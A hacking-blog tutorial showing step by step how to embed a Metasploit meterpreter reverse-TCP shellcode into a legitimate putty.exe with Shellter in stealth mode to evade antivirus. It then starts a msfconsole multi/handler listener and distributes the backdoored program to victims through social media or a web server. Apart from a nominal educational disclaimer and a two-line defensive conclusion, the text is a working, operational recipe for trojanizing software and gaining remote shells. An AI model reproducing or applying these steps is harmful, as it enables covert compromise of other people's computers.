Demo 3 - Exploit Windows - Shellter Tool
Introduction:
Hi there, welcome back to HackWithV. In this article I'm going to show you how to exploit Windows using the Metasploit Framework and the Shellter tool.
Shellter (shellcode alter) is a tool compatible with Windows and Linux. It is used for shellcode insertion. It effectively re-encodes payloads to bypass antivirus software. Shellter has proved to be the first dynamic infector for the PE (Portable Executable) file format of 32-bit Windows applications.
Metasploit is an open-source penetration testing platform that is used to find and exploit vulnerabilities.
Disclaimer: The articles provided on HackWithV are purely for informational and educational purposes only, and for those who are willing and curious to know and learn about Ethical Hacking, Security and Penetration Testing. Any time the word "Hacking" is used on this site, it shall be regarded as Ethical Hacking.
Requirements:
1. Attacker:
- OS : Kali Linux
- Internet : Yes
2. Victim:
- OS : Windows
- Internet : Yes
Steps for Exploiting:
- Download a 32-bit Windows application (.exe).
- Download and install Shellter.
- Run the Shellter tool and generate the altered Windows application (.exe).
- Listen for connections using msfconsole.
- Share and run the generated Windows application on the Target Machine (Windows).
Note: This attack is performed in a local area network (LAN). The Attacker Machine and Target Machine are connected to the same network.
1. Download 32-bit Windows Application:
- For the time being, I'm downloading the 32-bit putty.exe application. You can download it by clicking here (putty.exe).
2. Download and Install Shellter:
- In Kali Linux, install the shellter package with the following command.
# apt-get install shellter
- Running Shellter in Kali Linux requires the wine32 package. To install the wine32 package, use the following command.
# apt-get install wine32
3. Run Shellter and Generate Application:
- To run the Shellter tool, use the following command.
# shellter
- It opens a wine32 window as shown in the screenshot.
- It asks for the operation mode; select auto (i.e., A). It then asks for the PE target; give the location of the file putty.exe (ex: /root/Downloads/putty.exe) as shown in the screenshot.
- Wait for some time while it creates a DisASM.dll file as shown in the screenshot.
- Then it asks whether to enable stealth mode; press Y as shown in the screenshot.
- Then it asks whether to use a listed payload or a custom one; press L. When it asks to select the payload by index, press 1 as shown in the screenshot.
- Then it asks for LHOST and LPORT. You can get the LHOST value (i.e., the local IP address) using the ifconfig command in a terminal. Give that LHOST value (ex: 192.168.0.16) and a random LPORT (ex: 3535) as shown in the screenshot.
- Wait for 1-2 minutes while it creates a shellcode with the LHOST and LPORT values; this shellcode is injected into putty.exe as shown in the screenshot.
4. Listen for Connections (msfconsole):
- First start postgresql and then start msfconsole using the following commands.
# service postgresql start
# msfconsole
- Set all values as given below
msf> use exploit/multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST <local IP of Kali linux ex:192.168.0.16>
msf> set LPORT <random number, ex: 3535>
msf> exploit
- The listener is now started and waiting for the incoming connection from the victim machine.
5. Share and Run the Payload:
- Now share the payload (putty.exe) with the victim via any social media platform or by hosting it on any server.
- Here I have hosted putty.exe on an Apache server, then accessed and downloaded it as shown in the screenshot.
- Now run putty.exe as shown in the screenshot.
- When putty.exe is run, it runs as usual as shown in the screenshot.
- Whenever the victim (Windows) downloads and runs putty.exe, we get a meterpreter session (connection to the Kali machine) in Step 4 (msfconsole) as shown in the screenshot.
- Booooom, Windows is exploited.
Conclusion:
- Don't download exe files from unknown sources.
- Monitor the system resources.
- If you have any queries, post them in the comment section below.